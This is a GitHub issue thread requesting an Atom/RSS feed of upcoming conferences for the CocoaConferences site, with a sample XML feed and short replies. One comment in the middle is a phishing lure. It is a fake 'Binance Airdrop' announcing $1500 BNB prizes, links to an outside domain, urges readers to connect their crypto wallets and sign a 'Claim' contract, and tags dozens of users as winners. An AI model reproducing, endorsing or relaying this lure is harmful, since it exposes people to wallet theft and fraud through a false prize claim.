### ISSUE TITLE
RSS feed of conferences

### ISSUE THREAD

**Issue by jeroenleenarts** [Lascorbe/CocoaConferences#253]
Would it be an idea to generate a list of conferences for RSS?

It should relatively another rendering of the current yaml file.

I'd say everytime the site gets updated, the rss is generated as well only containing upcoming conference.

I am not familiar enough with Jekyll to quickly hash out an rss page myself.

**Comment by davedelong** [comment]
You're right that this should be a relative straight-forward addition. The big question in my mind is what should be in the feed?

If you'd be willing to dig up the XML you'd like to see for a conference listed in the feed, I'd be happy to get that in for you.

**Comment by jeroenleenarts** [comment]
How about something like:
```
<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom">
   <title>Cocoa Conferences</title>
   <link>https://cocoaconferences.com</link>
   <updated>[date last generated]</updated>
   
   <author>
      <name>Cocoa Conferences</name>
   </author>
   
   <id>https://cocoaconferences.com</id>
   
   <entry>
      <title>NSSpain 2020 Remote Edition</title>
      <link>https://remote.nsspain.com/</link>
      <id>https://remote.nsspain.com/</id><!-- Maybe make id more unique by appending begin and/or end data -->
      
      <updated><!-- Not sure what to put in here. Maybe annotate an updated line into the yml file?--></updated>
      <summary>A somewhat formatted summary containing info like on the website.</summary>
   </entry>
   
</feed>
```
Entries that are in the past should not be listed in the RSS feed.

**Comment by sulthanallaudeen** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @MattBCarr, @bajso, @Umairgill757, @psalm842, @0xgui, @ipseidev, @tushargupta2262, @cryptondee, @ninraiun, @maxgrev, @Alex-Lanser, @ing-norante, @MuhammadLuqman-99, @fractalgenisis, @grimfeld, @EEXstnce, @luckyadogun, @rafaeldkb, @Venus-Trap, @Phillip-web, @qliang0816, @pwang8287, @ervinMamutov, @jitangupta, @AnorakArturo, @luanntgenki, @hrtsislian, @Akash-Ghode, @pranavbehal, @qxvlada, @Doge-is-Dope, @bugcontract, @In-S4n3, @pdagboola, @ryan0217, @XolaniMoses, @LowNightSnack, @erratinsilentio, @root684, @jcozart, @MedAmineFouzai, @Robert-W-Ward, @wuyang77, @JAYANTH5775, @bastiansmn, @yukinotech, @PanagiotisBogas, @Saidyaqub1234, @LMDCassie, @mikozee12

**Comment by deverman** [comment]
+1 for RSS feed
